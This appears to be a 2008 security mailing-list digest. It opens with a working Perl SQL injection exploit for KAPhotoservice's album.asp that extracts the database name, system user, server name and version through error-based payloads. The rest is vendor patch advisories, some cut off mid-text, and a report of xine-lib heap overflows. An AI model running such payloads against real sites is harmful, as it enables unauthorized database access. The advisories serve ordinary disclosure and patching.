KAPhotoservice (album.asp) Remote SQL Injection Exploit
[+] [JosS] + [Spanish Hackers Team] + [Sys - Project]
[+] Info:
[~] Software: KAPhotoservice (Payment)
[~] Demo: http://www.kaphotoservice.com/photoservice/
[~] Exploit: Remote SQL Injection [High]
[~] Bug Found By: JosS
[~] Contact: sys-project[at]hotmail.com
[~] Web: http://www.spanish-hackers.com
[~] Vuln File: album.asp
[+] Exploit:
#!/usr/bin/perl
# KAPhotoservice - Remote SQL Injection Exploit
# Code by JosS
# Contact: sys-project[at]hotmail.com
# Spanish Hackers Team
# www.spanish-hackers.com
use IO::Socket::INET;
use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;
sub lw
{
my $SO = $^O;
my $linux = "";
if (index(lc($SO),"win")!=-1){
$linux="0";
}else{
$linux="1";
}
if($linux){
system("clear");
}
else{
system("cls");
system ("title KAPhotoservice - Remote SQL Injection Exploit");
system ("color 02");
}
}
#*** expl **
&lw;
print "\t\t\n\n";
print "\t\t#KAPhotoservice - Remote SQL Injection Exploit #\n\n";
print "\t\t#by JosS #\n\n";
print "\t\t\n\n";
$host=$ARGV[0];
chop $host;
$host=$host."/album.asp?cat=&apage=&albumid=";
if(!$ARGV[0]) {
print "\n[x] KAPhotoservice - Remote SQL Injection Exploit\n";
print "[x] written by JosS - sys-project[at]hotmail.com\n";
print "[x] usage: perl $0 [host]\n";
print "[x] example: http://host.com/PHPWebquest\n";;
exit(1);
}
@comando=("1+and+1=convert(int,db_name())","1+and+1=convert(int,system_user)","1+and+1=convert(int,[EMAIL
PROTECTED]@servername)--",'1+and+1=convert(int,@@version)--');
for ($i=0;$i<=3;$i++)
{
my $final = $host.$comando[$i];
my $ua = LWP::UserAgent->new;
my $req = HTTP::Request->new(GET => $final);
$doc = $ua->request($req)->as_string;
if ( $doc =~ /Syntax\s(.*)<\/font>/mosix )
{
if ($comando[$i] eq "1+and+1=convert(int,db_name())")
{
print "db_name:\n";
$dbname = $1 if ($doc =~ /.*value\s'(.*)'\sto.*/);
print "$dbname\n\n";
}
if ($comando[$i] eq "1+and+1=convert(int,system_user)")
{
print "system_user:\n";
$systemuser = $1 if ($doc =~ /.*value\s'(.*)'\sto.*/);
print "$systemuser\n\n";
}
if ($comando[$i] eq "1+and+1=convert(int,[EMAIL PROTECTED]@servername)--")
{
print "servername:\n";
$servername = $1 if ($doc =~ /.*value\s'(.*)'\sto.*/);
print "$servername\n\n";
}
if ($comando[$i] eq '1+and+1=convert(int,@@version)--')
{
print "version:\n";
$version = $1 if ($doc =~ /.*?value\s'(.*?)'\sto.*/sm);
print "$version\n\n";
}
} # Cierre del if principal
} # cierre for
[ MDVSA-2008:073 ] - Updated perl-Net-DNS packages fix DoS vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2008:073 http://www.mandriva.com/security/ ___ Package : perl-Net-DNS Date: March 20, 2008 Affected: 2007.0, 2007.1, 2008.0, Corporate 3.0, Corporate 4.0 ___ Problem Description: A vulnerability in the Net::DNS perl module was found that could allow remote attackers to cause a denial of service via a crafted DNS response. The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6341 ___ Updated Packages: Mandriva Linux 2007.0: 1cf2397dcfe207d625bd24d1d7fc744a 2007.0/i586/perl-Net-DNS-0.58-1.2mdv2007.0.i586.rpm 434fdd9456118124117a26509c6d1674 2007.0/SRPMS/perl-Net-DNS-0.58-1.2mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: 374101d8c50675d8032c5695dfb0866f 2007.0/x86_64/perl-Net-DNS-0.58-1.2mdv2007.0.x86_64.rpm 434fdd9456118124117a26509c6d1674 2007.0/SRPMS/perl-Net-DNS-0.58-1.2mdv2007.0.src.rpm Mandriva Linux 2007.1: 8ff35127ae1c20c0b4e4cf3734b41d78 2007.1/i586/perl-Net-DNS-0.59-1.2mdv2007.1.i586.rpm 0630c817a581736750b3aa3a36330442 2007.1/SRPMS/perl-Net-DNS-0.59-1.2mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: 2db71882e00490ed228d3544e73d5dfa 2007.1/x86_64/perl-Net-DNS-0.59-1.2mdv2007.1.x86_64.rpm 0630c817a581736750b3aa3a36330442 2007.1/SRPMS/perl-Net-DNS-0.59-1.2mdv2007.1.src.rpm Mandriva Linux 2008.0: 46454d0d2ffbccc32875d38428f5dbb7 2008.0/i586/perl-Net-DNS-0.61-1.1mdv2008.0.i586.rpm 0dd436fba91470dbd4cc4a5371cfa909 2008.0/SRPMS/perl-Net-DNS-0.61-1.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 3724958b2631242743be3d24ed463e5f 2008.0/x86_64/perl-Net-DNS-0.61-1.1mdv2008.0.x86_64.rpm 0dd436fba91470dbd4cc4a5371cfa909 2008.0/SRPMS/perl-Net-DNS-0.61-1.1mdv2008.0.src.rpm Corporate 3.0: 34228478b5f31c0a2c9beb80de8a004b corporate/3.0/i586/perl-Net-DNS-0.39-2.2.C30mdk.i586.rpm 8846ab7ae3ecf66ee93666e4551e091b corporate/3.0/SRPMS/perl-Net-DNS-0.39-2.2.C30mdk.src.rpm Corporate 3.0/X86_64: 9d62397d900754063b46a1f6a7dcae9c corporate/3.0/x86_64/perl-Net-DNS-0.39-2.2.C30mdk.x86_64.rpm 8846ab7ae3ecf66ee93666e4551e091b corporate/3.0/SRPMS/perl-Net-DNS-0.39-2.2.C30mdk.src.rpm Corporate 4.0: 57bb9572548a1727cdfde07176a55fc2 corporate/4.0/i586/perl-Net-DNS-0.52-1.2.20060mlcs4.i586.rpm cd1731f072ad841c1244b6e873226422 corporate/4.0/SRPMS/perl-Net-DNS-0.52-1.2.20060mlcs4.src.rpm Corporate 4.0/X86_64: 454f468cd925c1fccdf20751ac884dd9 corporate/4.0/x86_64/perl-Net-DNS-0.52-1.2.20060mlcs4.x86_64.rpm cd1731f072ad841c1244b6e873226422 corporate/4.0/SRPMS/perl-Net-DNS-0.52-1.2.20060mlcs4.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.8 (GNU/Linux) iD8DBQFH4p/ImqjQ0CJFipgRAjg7AJ94BiQLAcokF5ttd9yHBSDBtDE08ACgys4V HlrGqAi2vzXL0Oc7eQ7AX2g= =CA0R -END PGP SIGNATURE-
[USN-589-1] unzip vulnerability
=== Ubuntu Security Notice USN-589-1 March 20, 2008 unzip vulnerability CVE-2008-0888 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 6.10 Ubuntu 7.04 Ubuntu 7.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: unzip 5.52-6ubuntu4.1 Ubuntu 6.10: unzip 5.52-8ubuntu1.1 Ubuntu 7.04: unzip 5.52-9ubuntu3.1 Ubuntu 7.10: unzip 5.52-10ubuntu1.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Tavis Ormandy discovered that unzip did not correctly clean up pointers. If a user or automated service was tricked into processing a specially crafted ZIP archive, a remote attacker could execute arbitrary code with user privileges. Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_5.52-6ubuntu4.1.diff.gz Size/MD5:12788 c944a77823f756df4f6f1352028c51ba http://security.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_5.52-6ubuntu4.1.dsc Size/MD5: 535 05a4c713cd2bc201d7fec5dd0f1807ce http://security.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_5.52.orig.tar.gz Size/MD5: 1140291 9d2391d6eac9217d1f41472034a9 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_5.52-6ubuntu4.1_amd64.deb Size/MD5: 161102 b975bb72efc3b8b8a7355011090a76d3 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_5.52-6ubuntu4.1_i386.deb Size/MD5: 147240 7470f2fa04517e0b5b601f69db54ac84 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_5.52-6ubuntu4.1_powerpc.deb Size/MD5: 165218 a6b0dc720809d80d31e809492056eee0 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_5.52-6ubuntu4.1_sparc.deb Size/MD5: 164078 552d2029d247f091442e174eae9c3a19 Updated packages for Ubuntu 6.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_5.52-8ubuntu1.1.diff.gz Size/MD5:12565 7c86995d3353555020b5072979437d32 http://security.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_5.52-8ubuntu1.1.dsc Size/MD5: 535 942549c5fc2654810ecece441c702ed7 http://security.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_5.52.orig.tar.gz Size/MD5: 1140291 9d2391d6eac9217d1f41472034a9 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_5.52-8ubuntu1.1_amd64.deb Size/MD5: 164316 1fba1ee7c30fbd2572c49d55938eac54 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_5.52-8ubuntu1.1_i386.deb Size/MD5: 151466 20e48a45fad384a8310ce970c00903b2 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_5.52-8ubuntu1.1_powerpc.deb Size/MD5: 165248 c9f333ffc8b3ea28bd5882c6f683d200 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_5.52-8ubuntu1.1_sparc.deb Size/MD5: 163544 b9cf45c1b44e808e6f4bc28a0e462ba5 Updated packages for Ubuntu 7.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_5.52-9ubuntu3.1.diff.gz Size/MD5:91922 4ab4fa170cfb1009969476118e6c5ea0 http://security.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_5.52-9ubuntu3.1.dsc Size/MD5: 619 721b61d3b81b58e01eab7e4d75ec0616 http://security.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_5.52.orig.tar.gz Size/MD5: 1140291 9d2391d6eac9217d1f41472034a9 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_5.52-9ubuntu3.1_amd64.deb Size/MD5: 167272 1b0f7e30281083c3c1f7ee7ea1edbff4 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_5.52-9ubuntu3.1_i386.deb Size/MD5: 154032 ab6718b23c1cff644082b0126a72a02e powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_5.52-9ubuntu3.1_powerpc.deb Size/MD5: 169850 b3cf955d0462608841b350435a049f4d sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_5.52-9ubuntu3.1_sparc.deb Size/MD5: 166698 4a8cfaa0a4f1eb5bd54649a8a770b9fd Updated packages for Ubuntu 7.10: Source archives: http
Multiple heap overflows in xine-lib 1.1.11
###
Luigi Auriemma
Application: xine-lib
http://xinehq.de
Versions: <= 1.1.11
Platforms:Linux, *BSD, Solaris, Irix, MacOSX, Windows and others
Bugs: A] heap-overflow in demux_flv
B] heap-overflow in demux_qt
C] heap-overflow in demux_real
D] heap-overflow in demux_wc3movie
E] heap-overflow in ebml
F] heap-overflow in demux_film
Exploitation: local
Date: 20 Mar 2008
Author: Luigi Auriemma
e-mail: [EMAIL PROTECTED]
web:aluigi.org
###
1) Introduction
2) Bugs
3) The Code
4) Fix
###
===
1) Introduction
===
>From developers website:
"xine is a free (gpl-licensed) high-performance, portable and reusable
multimedia playback engine. xine itself is a shared library with an
easy to use, yet powerful API which is used by many applications for
smooth video playback and video processing purposes."
The library and parts of its source code are widely used in many open
source players and projects.
###
===
2) Bugs
===
xine-lib is affected by various heap overflow vulnerabilities caused by
the wrong 32 bit calculation of the amount of memory to allocate for
some destination buffers and arrays.
These bugs allow an attacker to control some registers or directly the
code flow (like with demux_qt) which could leat to the execution of
malicious code.
For brevity will be showed directly the instructions in the source code
which do these bad allocations.
-
A] heap-overflow in demux_flv
-
>From src/demuxers/demux_flv.c:
static int parse_flv_var(demux_flv_t *this,
unsigned char *buf, int size, char *key, int keylen) {
...
this->index = xine_xmalloc(num*sizeof(flv_index_entry_t));
...
this->index = xine_xmalloc(num*sizeof(flv_index_entry_t));
B] heap-overflow in demux_qt
Practically almost any allocation instruction in
src/demuxers/demux_qt.c is vulnerable to various types of heap
overflows.
--
C] heap-overflow in demux_real
--
>From src/demuxers/demux_real.c:
static void real_parse_index(demux_real_t *this) {
...
*index = xine_xmalloc(entries * sizeof(real_index_entry_t));
--
D] heap-overflow in demux_wc3movie
--
>From src/demuxers/demux_wc3movie.c:
static int open_mve_file(demux_mve_t *this) {
...
this->palettes = xine_xmalloc(this->number_of_shots * PALETTE_SIZE *
sizeof(palette_entry_t));
Note that the output buffer is filled using a special lookup table.
E] heap-overflow in ebml
>From src/demuxers/ebml.c:
int ebml_check_header(ebml_parser_t *ebml) {
...
char *text = malloc(elem.len + 1);
--
F] heap-overflow in demux_film
--
>From src/demuxers/demux_film.c:
static int open_film_file(demux_film_t *film) {
...
film->sample_table =
xine_xmalloc(film->sample_count * sizeof(film_sample_t));
###
===
3) The Code
===
http://aluigi.org/poc/xinehof.zip
###
==
4) Fix
==
No fix
###
---
Luigi Auriemma
http://aluigi.org
[ MDVSA-2008:072 ] - Updated kernel packages fix vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2008:072 http://www.mandriva.com/security/ ___ Package : kernel Date: March 20, 2008 Affected: Corporate 3.0, Multi Network Firewall 2.0 ___ Problem Description: The Linux kernel prior to 2.6.22.17, when using certain drivers that register a fault handler that does not perform range checks, allowed local users to access kernel memory via an out-of-range offset (CVE-2008-0007). Additionally, this kernel fixes a JBD checkpoint memory leak bug. To update your kernel, please follow the directions located at: http://www.mandriva.com/en/security/kernelupdate ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0007 ___ Updated Packages: Corporate 3.0: 02a9abf32ab0acd35b367cef34d60e91 corporate/3.0/i586/kernel-2.6.3.38mdk-1-1mdk.i586.rpm 1926b9663ebce026d6ef0cc4b17c8900 corporate/3.0/i586/kernel-BOOT-2.6.3.38mdk-1-1mdk.i586.rpm 21affa41dca0a6545c75b45472d5508d corporate/3.0/i586/kernel-doc-2.6.3-38mdk.i586.rpm 11a27b6746383fc05398d88819262a15 corporate/3.0/i586/kernel-enterprise-2.6.3.38mdk-1-1mdk.i586.rpm d64c328410eabb26cb74fcc526c8078d corporate/3.0/i586/kernel-i686-up-4GB-2.6.3.38mdk-1-1mdk.i586.rpm c683085999e3e7e94fc219225dadc842 corporate/3.0/i586/kernel-p3-smp-64GB-2.6.3.38mdk-1-1mdk.i586.rpm 3ebbffdc4bc4931948d4b7fe49c44021 corporate/3.0/i586/kernel-secure-2.6.3.38mdk-1-1mdk.i586.rpm 6ce3bbd2c69db61e54a0903b42d64e8a corporate/3.0/i586/kernel-smp-2.6.3.38mdk-1-1mdk.i586.rpm cde3607985288c7286886bf8762850ea corporate/3.0/i586/kernel-source-2.6.3-38mdk.i586.rpm 1262426cd7186f9a4e6e8e51d656776a corporate/3.0/i586/kernel-source-stripped-2.6.3-38mdk.i586.rpm ec8008a027b33c8f07c561ac28451081 corporate/3.0/SRPMS/kernel-2.6.3.38mdk-1-1mdk.src.rpm Corporate 3.0/X86_64: b0885f347038ab0f9e28f89cbcaf9abf corporate/3.0/x86_64/kernel-2.6.3.38mdk-1-1mdk.x86_64.rpm 6c4779262b7f478ec5c7af9a6a0882cc corporate/3.0/x86_64/kernel-BOOT-2.6.3.38mdk-1-1mdk.x86_64.rpm b0e5f311e37553ccc779bc1c2699d6d8 corporate/3.0/x86_64/kernel-doc-2.6.3-38mdk.x86_64.rpm cd4a1452a1b420e88792b23c9c63ddf6 corporate/3.0/x86_64/kernel-secure-2.6.3.38mdk-1-1mdk.x86_64.rpm eb77a0239c0b8673d1027d897ba7261b corporate/3.0/x86_64/kernel-smp-2.6.3.38mdk-1-1mdk.x86_64.rpm 424a83259a0a6f12426056230640d71f corporate/3.0/x86_64/kernel-source-2.6.3-38mdk.x86_64.rpm 6ca7e51f1200272a1848310b2f9f54d5 corporate/3.0/x86_64/kernel-source-stripped-2.6.3-38mdk.x86_64.rpm ec8008a027b33c8f07c561ac28451081 corporate/3.0/SRPMS/kernel-2.6.3.38mdk-1-1mdk.src.rpm Multi Network Firewall 2.0: cddca9d5e516af19ef235d575b964e7d mnf/2.0/i586/kernel-2.6.3.38mdk-1-1mdk.i586.rpm e283b1cd0a86ec26940561a93fa1f702 mnf/2.0/i586/kernel-i686-up-4GB-2.6.3.38mdk-1-1mdk.i586.rpm d9ac1515cb52c4bb67f010fcc4b921c8 mnf/2.0/i586/kernel-p3-smp-64GB-2.6.3.38mdk-1-1mdk.i586.rpm 2d9f4e7b854c703701d9c8ec2e54029a mnf/2.0/i586/kernel-secure-2.6.3.38mdk-1-1mdk.i586.rpm 5ed5914f0dee93412a8093ff9422a451 mnf/2.0/i586/kernel-smp-2.6.3.38mdk-1-1mdk.i586.rpm b0303437993328b249575c512a2177c3 mnf/2.0/SRPMS/kernel-2.6.3.38mdk-1-1mdk.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.8 (GNU/Linux) iD8DBQFH4nY7mqjQ0CJFipgRAgRiAKCW8WBx3XZaU+Q8CBfGoATEuv0v8QCfaSyr Yp9yH/PEuFJhJufVylACR1s= =HEjm -END PGP SIGNATURE-
Note about recently publicized CA BrightStor ActiveX exploit code
CA is reviewing exploit code that was posted on 2008-03-16 to the Milw0rm exploit archive web site. This exploit code is potentially associated with vulnerabilities that may exist in CA BrightStor ARCserve Backup for Laptops and Desktops and/or related products. CA will issue an advisory after we have completed our initial investigation. Regards, Ken Williams ; 0xE2941985 Director, CA Vulnerability Research
[SECURITY] [DSA 1522-1] New xwine packages fix several vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1526-1 [EMAIL PROTECTED] http://www.debian.org/security/ Steve Kemp March 20, 2008http://www.debian.org/security/faq - Package: xwine Vulnerability : various Problem type : local Debian-specific: no CVE Id(s) : CVE-2008-0930 CVE-2008-0931 Steve Kemp from the Debian Security Audit project discovered several local vulnerabilities have been discovered in xwine, a graphical user interface for the WINE emulator. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2008-0930 The xwine command makes unsafe use of local temporary files when printing. This could allow the removal of arbitrary files belonging to users who invoke the program. CVE-2008-0931 The xwine command changes the permissions of the global WINE configuration file such that it is world-writable. This could allow local users to edit it such that arbitrary commands could be executed whenever any local user executed a program under WINE. For the stable distribution (etch), these problems have been fixed in version 1.0.1-1etch1. We recommend that you upgrade your xwine package. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - --- Source archives: http://security.debian.org/pool/updates/main/x/xwine/xwine_1.0.1-1etch1.diff.gz Size/MD5 checksum:27365 a7f1316789d0d54fbfdfbbbca8fb5c27 http://security.debian.org/pool/updates/main/x/xwine/xwine_1.0.1-1etch1.dsc Size/MD5 checksum: 619 477cc8074941df31e0d3c04c2d5ecf90 http://security.debian.org/pool/updates/main/x/xwine/xwine_1.0.1.orig.tar.gz Size/MD5 checksum: 1527684 2748b66d5ab0b4cc172cbb296cc8363b alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/x/xwine/xwine_1.0.1-1etch1_alpha.deb Size/MD5 checksum: 1078778 f7f62194f4bcfcf08b3f24c2caad2cf0 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/x/xwine/xwine_1.0.1-1etch1_amd64.deb Size/MD5 checksum: 1044810 5a9c6db84637c399f53ac631685d359d arm architecture (ARM) http://security.debian.org/pool/updates/main/x/xwine/xwine_1.0.1-1etch1_arm.deb Size/MD5 checksum: 1042890 88b6f1cc95a3d1064be79c420535b70c hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/x/xwine/xwine_1.0.1-1etch1_hppa.deb Size/MD5 checksum: 1054266 9eb4ea73d3ea9eef16f9f8002e9b3d43 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/x/xwine/xwine_1.0.1-1etch1_i386.deb Size/MD5 checksum: 1049258 caf4aeb5e2a45b6c38abe8f5e0c7fb61 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/x/xwine/xwine_1.0.1-1etch1_ia64.deb Size/MD5 checksum: 1099784 a3a5facdb404d481df42ee386402b4fa powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/x/xwine/xwine_1.0.1-1etch1_powerpc.deb Size/MD5 checksum: 1045496 74235e48bda3cb5b43f589be5962c65f s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/x/xwine/xwine_1.0.1-1etch1_s390.deb Size/MD5 checksum: 1021898 374b7326c9092fba9d34eea4e3d69ce0 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/x/xwine/xwine_1.0.1-1etch1_sparc.deb Size/MD5 checksum: 1037724 32c6b9725b87a9f81074667290fab29b These files will probably be moved into the stable distribution on its next update. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: [EMAIL PROTECTED] Package info: `apt-cache show ' and http://packages.debian.org/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFH4rYOwM/Gs81MDZ0RAhM/AKClVPQIykIm2h9v/Te/vgF6Tb5RkgCgrWlL kEKXH2c6/XFtM4lF0jSFrIM= =Iknm -END PGP SIGNATURE-
[USN-588-1] MySQL vulnerabilities
=== Ubuntu Security Notice USN-588-1 March 19, 2008 mysql-dfsg-5.0 vulnerabilities CVE-2006-7232, CVE-2007-2692, CVE-2007-6303, CVE-2008-0226, CVE-2008-0227 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 6.10 Ubuntu 7.04 Ubuntu 7.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: mysql-server-5.05.0.22-0ubuntu6.06.8 Ubuntu 6.10: mysql-server-5.05.0.24a-9ubuntu2.4 Ubuntu 7.04: mysql-server-5.05.0.38-0ubuntu1.4 Ubuntu 7.10: mysql-server-5.05.0.45-1ubuntu3.3 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Masaaki Hirose discovered that MySQL could be made to dereference a NULL pointer. An authenticated user could cause a denial of service (application crash) via an EXPLAIN SELECT FROM on the INFORMATION_SCHEMA table. This issue only affects Ubuntu 6.06 and 6.10. (CVE-2006-7232) Alexander Nozdrin discovered that MySQL did not restore database access privileges when returning from SQL SECURITY INVOKER stored routines. An authenticated user could exploit this to gain privileges. This issue does not affect Ubuntu 7.10. (CVE-2007-2692) Martin Friebe discovered that MySQL did not properly update the DEFINER value of an altered view. An authenticated user could use CREATE SQL SECURITY DEFINER VIEW and ALTER VIEW statements to gain privileges. (CVE-2007-6303) Luigi Auriemma discovered that yaSSL as included in MySQL did not properly validate its input. A remote attacker could send crafted requests and cause a denial of service or possibly execute arbitrary code. This issue did not affect Ubuntu 6.06 in the default installation. (CVE-2008-0226, CVE-2008-0227) Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.22-0ubuntu6.06.8.diff.gz Size/MD5: 154026 cd5be852f614715c69ac54ad2d908007 http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.22-0ubuntu6.06.8.dsc Size/MD5: 1114 38d198b9bc8f33d842c2d357993c9f3f http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.22.orig.tar.gz Size/MD5: 18446645 2b8f36364373461190126817ec872031 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-client_5.0.22-0ubuntu6.06.8_all.deb Size/MD5:38436 8749eaaabf09f33d085c85994ff207a8 http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-common_5.0.22-0ubuntu6.06.8_all.deb Size/MD5:40978 fd1f742c531c1990eefc8f06028c343f http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server_5.0.22-0ubuntu6.06.8_all.deb Size/MD5:38440 a13b593991c0ff0112d045e4436aeb3f amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.22-0ubuntu6.06.8_amd64.deb Size/MD5: 6727526 dd790f5dcbce8f9d2a459946298ee6f9 http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.22-0ubuntu6.06.8_amd64.deb Size/MD5: 1423360 e44952b82afd0b764cd4462d61510b2f http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.22-0ubuntu6.06.8_amd64.deb Size/MD5: 6897080 6157f55dd2d66f5ce1ca3c6864f93ff6 http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.22-0ubuntu6.06.8_amd64.deb Size/MD5: 22492504 208ed17bc66d59499214fe923c73e429 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.22-0ubuntu6.06.8_i386.deb Size/MD5: 6141668 18fb4e3c6f0feb080cd9adf0a96c7c13 http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.22-0ubuntu6.06.8_i386.deb Size/MD5: 1383858 48190b45874e9a9923a00a9b6f89ac67 http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.22-0ubuntu6.06.8_i386.deb Size/MD5: 6279562 c5a4cf82a4bf174d1d857caccd9e01c0 http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.22-0ubuntu6.06.8_i386.deb Size/MD5: 21350958 03334dcddd8b546b631509c01f81bdc1 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.22-0ubuntu6.06.8_powerpc.deb Size/MD5: 6885298 8336b3f8c45f241a3f71f59354ab8a0e http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.22-0ubuntu6.06.8_powerpc.deb Size/MD5: 1463710 92e0812d91b71bc2ae7b
[SECURITY] [DSA 1525-1] New asterisk packages fix several vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1525-1 [EMAIL PROTECTED] http://www.debian.org/security/ Moritz Muehlenhoff March 20, 2008http://www.debian.org/security/faq - Package: asterisk Vulnerability : several Problem type : remote Debian-specific: no CVE Id(s) : CVE-2007-6430 CVE-2008-1332 CVE-2008-1333 Several remote vulnerabilities have been discovered in Asterisk, a free software PBX and telephony toolkit. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2007-6430 Tilghman Lesher discovered that database-based registrations are insufficiently validated. This only affects setups, which are configured to run without a password and only host-based authentication. CVE-2008-1332 Jason Parker discovered that insufficient validation of From: headers inside the SIP channel driver may lead to authentication bypass and the potential external initiation of calls. This update also fixes a format string vulnerability, which can only be triggered through configuration files under control of the local administrator. In later releases of Asterisk this issue is remotely exploitable and tracked as CVE-2008-1333. For the stable distribution (etch), these problems have been fixed in version 1:1.2.13~dfsg-2etch3. The status of the old stable distribution (sarge) is currently being investigated. If affected, an update will be released through security.debian.org. We recommend that you upgrade your asterisk packages. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get 